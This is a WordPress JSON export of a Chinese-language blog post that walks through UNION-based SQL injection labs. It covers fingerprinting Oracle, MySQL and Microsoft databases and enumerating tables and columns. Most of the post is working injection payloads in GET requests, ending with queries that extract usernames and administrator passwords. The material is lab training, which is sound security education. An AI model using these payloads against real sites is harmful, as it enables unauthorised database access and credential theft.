{"id":1232,"date":"2023-02-16T10:28:00","date_gmt":"2023-02-16T02:28:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1232"},"modified":"2024-02-17T20:19:25","modified_gmt":"2024-02-17T12:19:25","slug":"sqli-for-examining-the-db","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1232","title":{"rendered":"SQLi for Examining the DB"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u70ba\u4e86\u5229\u7528 SQL \u6ce8\u5165\u6f0f\u6d1e\uff0c\u901a\u5e38\u9700\u8981\u5c0b\u627e\u6709\u95dc\u8cc7\u6599\u5eab\u7684\u8cc7\u8a0a\uff0c\u50cf\u662f\u6578\u64da\u5eab\u985e\u578b\u8207\u7248\u672c\uff0c\u4ee5\u53ca\u8cc7\u6599\u8868\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53d6\u5f97\u6578\u64da\u5eab\u985e\u578b<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5404\u6578\u64da\u5eab\u67e5\u8a62\u7248\u672c\u7684\u65b9\u6cd5\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><th>Oracle<\/th><td><code>SELECT banner FROM v$version<br>SELECT version FROM v$instance<\/code><\/td><\/tr><tr><th>Microsoft \/ MySQL<\/th><td><code>SELECT @@version<\/code><\/td><\/tr><tr><th>PostgreSQL<\/th><td><code>SELECT version()<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u8209\u4f8b\u4f86\u8aaa\uff0c\u5982\u679c\u767c\u73fe\u6709\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u7528\u4ee5\u4e0bsql\u6e2c\u8a66\u6578\u64da\u5eab\u662f\u5426\u70baoracle\u4ee5\u53ca\u5176\u7248\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+BANNER,+NULL+FROM+v$version--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u53ef\u7528\u4ee5\u4e0bsql\u6e2c\u8a66\u6578\u64da\u5eab\u662f\u5426\u70bamysql\u6216microsoft\u53ca\u5176\u7248\u672c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+@@version,+NULL#<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: <br>SQL injection attack, querying the database type and version on Oracle<br>SQL injection attack, querying the database type and version on MySQL and Microsoft<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53d6\u5f97\u8cc7\u6599\u8868\u4fe1\u606f<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">non-oracle<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5305\u542b\u50cf\u662f\uff2dicrosoft SQL Server\uff0cPostgreSQL\uff0cMySQL\uff0c\u5e38\u7528\u8a9e\u6cd5\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>SELECT * FROM information_schema.tables<\/code><\/li>\n\n\n\n<li><code>SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u5047\u8a2d\u76ee\u6a19\u7db2\u7ad9\u975eOracle\uff0c\u53ef\u7528\u53c3\u8003\u4ee5\u4e0b\u65b9\u5f0f\u53d6\u5f97\u654f\u611f\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528\u4ee5\u4e0b\u6e2c\u8a66\u6642\u767c\u73fecategory\u53c3\u6578sqli\u6f0f\u6d1e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6aa2\u6e2c\u6709\u5e7e\u500b\u6b04\u4f4d\u53ef\u986f\u793a\uff0c\u4ee5\u4e0b\u7d50\u679c\u78ba\u8a8d2\u500b\u4e0d\u5831\u932f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+union+select+null,null--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6aa2\u6e2c\u90a3\u4e9b\u6b04\u4f4d\u6709\u6578\u64da\uff0c\u4ee5\u4e0b\u7d50\u679c\u78ba\u8a8d2\u500b\u6b04\u4f4d\u90fd\u6709<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+'abc','def'--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7528\u4ee5\u4e0b\u8a9e\u6cd5\u627e\u51fa\u6240\u6709table<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u5167\u5bb9\u767c\u73feusers_icgasr\uff0c\u7528\u4ee5\u4e0b\u8a9e\u6cd5\u627e\u8a72\u8868\u6b04\u4f4d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name=%27users_icgasr%27--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u5167\u5bb9\u767c\u73feusername_usnobp\u548cpassword_bdwaxs\u6b04\u4f4d\uff0c\u7528\u4ee5\u4e0b\u8a9e\u6cd5\u627e\u8a72\u6b04\u4f4d\u4fe1\u606f\u4ee5\u53d6\u5f97\u5e33\u6236\u5bc6\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+username_usnobp,password_bdwaxs+FROM+users_icgasr--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd4\u56de\u5167\u5bb9\u53ef\u4ee5\u627e\u5230administrator\u7684\u5bc6\u78bc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: SQL injection attack, listing the database contents on non-Oracle databases<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">oracle<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5e38\u7528\u8a9e\u6cd5\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>SELECT * FROM all_tables<\/code><\/li>\n\n\n\n<li><code>SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'<\/code><\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">\u5047\u8a2d\u76ee\u6a19\u7db2\u7ad9\u70baOracle\uff0c\u53ef\u7528\u53c3\u8003\u4ee5\u4e0b\u65b9\u5f0f\u53d6\u5f97\u654f\u611f\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6e2c\u8a66\u6642\u767c\u73fecategory\u53c3\u6578sqli\u6f0f\u6d1e\u5f8c\uff0c\u6aa2\u6e2c\u6709\u5e7e\u500b\u6b04\u4f4d\u53ef\u986f\u793a\uff0c\u767c\u73fe2\u500b\u4e0d\u5831\u932f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+union+select+null,null<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">+FROM+dual<\/mark>--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u6aa2\u6e2c\u54ea\u4e9b\u6b04\u4f4d\u6709\u6578\u64da\uff0c\u767c\u73fe2\u500b\u6b04\u4f4d\u90fd\u6709<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+'abc','def'+FROM+dual--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u627e\u51fa\u6240\u6709table<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+table_name,NULL+FROM+all_tables--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u767c\u73feUSERS_VNPRUT\uff0c\u627e\u8a72\u8868\u6b04\u4f4d<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name=%27USERS_VNPRUT%27--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u767c\u73feUSERNAME_HLFULL\u548cPASSWORD_GWJJKC\u6b04\u4f4d\uff0c\u627e\u8a72\u6b04\u4f4d\u4fe1\u606f\u4ee5\u53d6\u5f97\u5e33\u6236\u5bc6\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/filter?category=Accessories<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">'+UNION+SELECT+USERNAME_HLFULL,PASSWORD_GWJJKC+FROM+USERS_VNPRUT--<\/mark> HTTP\/1.1<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7d50\u679c\u53ef\u4ee5\u627e\u5230administrator\u7684\u5bc6\u78bc<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: SQL injection attack, listing the database contents on Oracle<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u70ba\u4e86\u5229\u7528 SQL \u6ce8\u5165\u6f0f\u6d1e\uff0c\u901a\u5e38\u9700\u8981\u5c0b\u627e\u6709\u95dc\u8cc7\u6599\u5eab\u7684\u8cc7\u8a0a\uff0c\u50cf &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-1232","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":1228,"url":"https:\/\/systw.net\/note\/archives\/1228","url_meta":{"origin":1232,"position":0},"title":"SQLi UNION attack","author":"raymond","date":"2023 \u5e74 2 \u6708 15 \u65e5","format":false,"excerpt":"UNION\u95dc\u9375\u5b57\u4f7f\u60a8\u80fd\u5920\u57f7\u884c\u4e00\u500b\u6216\u591a\u500b\u9644\u52a0SELECT\u67e5\u8a62\u4e26\u5c07\u7d50\u679c\u9644\u52a0\u5230\u539f\u59cb\u67e5\u8a62\uff0c\u5982\u4e0b SELECT\u2026","rel":"","context":"\u5728\u300cServerSide\u300d\u4e2d","block_context":{"text":"ServerSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/serverside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2589,"url":"https:\/\/systw.net\/note\/archives\/2589","url_meta":{"origin":1232,"position":1},"title":"SC Integer Overflow and Underflow","author":"raymond","date":"2024 \u5e74 8 \u6708 14 \u65e5","format":false,"excerpt":"\u6574\u6578\u6ea2\u4f4d\uff08Overflow\uff09\u8207\u4e0b\u6ea2\uff08Underflow\uff09\u662f\u667a\u80fd\u5408\u7d04\u4e2d\u7684\u4e00\u7a2e\u5b89\u5168\u6f0f\u6d1e\uff0c\u6e90\u65bc\u4ee5\u592a\u574a\u865b\u64ec\u6a5f\u2026","rel":"","context":"\u5728\u300cBlockchain Security\u300d\u4e2d","block_context":{"text":"Blockchain Security","link":"https:\/\/systw.net\/note\/archives\/category\/%e5%8d%80%e5%a1%8a%e9%8f%88\/blockchain-security"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1234,"url":"https:\/\/systw.net\/note\/archives\/1234","url_meta":{"origin":1232,"position":2},"title":"SQL blind injection","author":"raymond","date":"2023 \u5e74 2 \u6708 17 \u65e5","format":false,"excerpt":"\u7576\u61c9\u7528\u7a0b\u5f0f\u5bb9\u6613\u53d7\u5230 SQL \u6ce8\u5165\u653b\u64ca\uff0c\u4f46\u5176 HTTP \u56de\u61c9\u4e0d\u5305\u542b\u76f8\u95dc SQL \u67e5\u8a62\u7684\u7d50\u679c\u6216\u4efb\u4f55\u8cc7\u6599\u5eab\u2026","rel":"","context":"\u5728\u300cServerSide\u300d\u4e2d","block_context":{"text":"ServerSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/serverside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1080,"url":"https:\/\/systw.net\/note\/archives\/1080","url_meta":{"origin":1232,"position":3},"title":"HTB petpet rcbee","author":"raymond","date":"2023 \u5e74 12 \u6708 26 \u65e5","format":false,"excerpt":"\u5206\u6790\u4f9d\u8cf4\u5305\u767c\u73feRCE\u6f0f\u6d1e,\u4e26\u4f7f\u7528\u8a72\u6f0f\u6d1e\u53d6\u5f97flag","rel":"","context":"\u5728\u300c\u653b\u64ca\u624b\u6cd5\u300d\u4e2d","block_context":{"text":"\u653b\u64ca\u624b\u6cd5","link":"https:\/\/systw.net\/note\/archives\/category\/hackerskill"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/i.imgur.com\/TVxlXUy.jpg?fit=1024%2C1024&ssl=1&resize=350%2C200","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/i.imgur.com\/TVxlXUy.jpg?fit=1024%2C1024&ssl=1&resize=350%2C200 1x, https:\/\/i0.wp.com\/i.imgur.com\/TVxlXUy.jpg?fit=1024%2C1024&ssl=1&resize=525%2C300 1.5x, https:\/\/i0.wp.com\/i.imgur.com\/TVxlXUy.jpg?fit=1024%2C1024&ssl=1&resize=700%2C400 2x"},"classes":[]},{"id":1738,"url":"https:\/\/systw.net\/note\/archives\/1738","url_meta":{"origin":1232,"position":4},"title":"linux\u63d0\u6b0a","author":"raymond","date":"2024 \u5e74 12 \u6708 1 \u65e5","format":false,"excerpt":"Linux\u63d0\u6b0a\u662f\u6307\u5c07\u666e\u901a\u7528\u6236\u7684\u6b0a\u9650\u63d0\u5347\u81f3\u66f4\u9ad8\u6b0a\u9650\u7684\u904e\u7a0b\uff0c\u5e38\u898b\u65b9\u6cd5\u5305\u62ec\u4f7f\u7528Cron\u3001\u5bc6\u78bc\u6316\u6398\u3001\u74b0\u5883\u8b8a\u91cf\u2026","rel":"","context":"\u5728\u300cOperations\u300d\u4e2d","block_context":{"text":"Operations","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/operations"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1310,"url":"https:\/\/systw.net\/note\/archives\/1310","url_meta":{"origin":1232,"position":5},"title":"Information disclosure","author":"raymond","date":"2023 \u5e74 3 \u6708 1 \u65e5","format":false,"excerpt":"\u8cc7\u8a0a\u6d29\u6f0f\u662f\u6307\u7db2\u7ad9\u7121\u610f\u4e2d\u5c0d\u6f5b\u5728\u7684\u653b\u64ca\u8005\u6d29\u9732\u654f\u611f\u8cc7\u8a0a\uff0c\u5e38\u898b\u7684\u6709\u4ee5\u4e0b\uff1a \u5176\u4ed6\u7528\u6236\u7684\u6578\u64da\uff0c\u4f8b\u5982\u7528\u6236\u540d\u6216\u8ca1\u52d9\u4fe1\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1232","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1232"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1232\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1232"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1232"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1232"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}